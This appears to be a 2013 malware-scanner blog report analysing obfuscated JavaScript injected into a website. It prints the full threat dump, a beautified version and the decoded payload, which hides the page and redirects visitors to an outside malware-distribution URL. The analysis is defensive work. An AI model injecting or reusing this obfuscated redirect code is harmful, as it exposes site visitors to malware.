Obfuscated malicious JavaScript code redirects to remote malicious resource
Background
Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to generate the URL during web page rendering. When accessing such web page it downloads content from remote malware distributor. This infected website hosts suspicious JavaScript code injected in 2 files.
Malicious action
Real time URL generation is often used to download malware hosted on external web resources(websites).
Website malware scanner report
Submission date: Fri Apr 19 01:31:38 2013
Infected website's files: 2
 |
| Website malware scanner sitescan report by Quttera |
 |
| Malicious JavaScript |
Threat dump: [[<script type='text/javascript' language='javascript' >
// <![CDATA[
var OEtkdtANvKk = String.fromCharCode( 0x68, 116, 0164, 0x70, 072, 057, 47, 98, 101, 0163, 0164, 0x61, 0x6e, 0x64, 101, 0141, 0x73, 0151, 101, 115, 0164, 0x77, 0x61, 0x79, 0163, 116, 111, 0154, 0157, 0163, 0x65, 0167, 101, 105, 0x67, 104, 116, 0x2e, 99, 111, 109, 057, 0x69, 0156, 0x64, 101, 120, 0x65, 0x72, 0x2e, 112, 0150, 0x70, 63, 97, 075, 062, 50, 54, 0x38, 0x34, 53, 38, 0x63, 0x3d, 0167, 108, 0x5f, 0x63, 0x6f, 0156 );
var msKKpuoJVPjXfi = unescape("%69%66%20%28%77%69%6e" + "%64" + "%6f" + "%77%2e%6c%6f%63%61%74%69%6f" + "%6e%2e%68%61%73%68%20%3d%3d%20%22%23%77%79%76%6b%22%29%20%7b" + "%20%64%6f" + "%63%75%6d%65" + "%6e%74%2e%62%6f%64%79%2e%73" + "%74%79%6c%65%2e%64%69" + "%73%70%6c%61" + "%79" + "%3d%22%6e%6f%6e%65%22%3b" + "%20%77" + "%69%6e%64%6f%77%2e%6c%6f%63%61%74%69%6f" + "%6e%2e%68%72%65%66%20%3d%20\'")+OEtkdtANvKk+String.fromCharCode( 0x27, 59, 0x20, 0x7d );
eval(msKKpuoJVPjXfi);
// ]]>
</script>]]
Malware entry
Malware entry details.
Beautified script
- var OEtkdtANvKk = String.fromCharCode(0x68, 116, 0164, 0x70, 072, 057, 47, 98, 101, 0163, 0164, 0x61, 0x6e, 0x64,101, 0141, 0x73, 0151, 101, 115, 0164, 0x77, 0x61, 0x79, 0163, 116, 111, 0154, 0157, 0163, 0x65, 0167, 101, 105,0x67, 104, 116, 0x2e, 99, 111, 109, 057, 0x69, 0156, 0x64, 101, 120, 0x65, 0x72, 0x2e, 112, 0150, 0x70, 63, 97,075, 062, 50, 54, 0x38, 0x34, 53, 38, 0x63, 0x3d, 0167, 108, 0x5f, 0x63, 0x6f, 0156);
- var msKKpuoJVPjXfi = unescape("%69%66%20%28%77%69%6e" + "%64" + "%6f" + "%77%2e%6c%6f%63%61%74%69%6f" +"%6e%2e%68%61%73%68%20%3d%3d%20%22%23%77%79%76%6b%22%29%20%7b" + "%20%64%6f" + "%63%75%6d%65" +"%6e%74%2e%62%6f%64%79%2e%73" + "%74%79%6c%65%2e%64%69" + "%73%70%6c%61" + "%79" + "%3d%22%6e%6f%6e%65%22%3b" +"%20%77" + "%69%6e%64%6f%77%2e%6c%6f%63%61%74%69%6f" + "%6e%2e%68%72%65%66%20%3d%20\'") + OEtkdtANvKk +String.fromCharCode(0x27, 59, 0x20, 0x7d);
- eval(msKKpuoJVPjXfi);
Malicious payload
Decoded payload generates redirection to malicious web resource
- if (window.location.hash == "#wyvk") {
- document.body.style.display = "none";
- window.location.href = 'http://bestandeasiestwaystoloseweight.com/indexer.php?a=226845&c=wl_con';
- }
Malware clean-up
Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.
No comments:
Post a Comment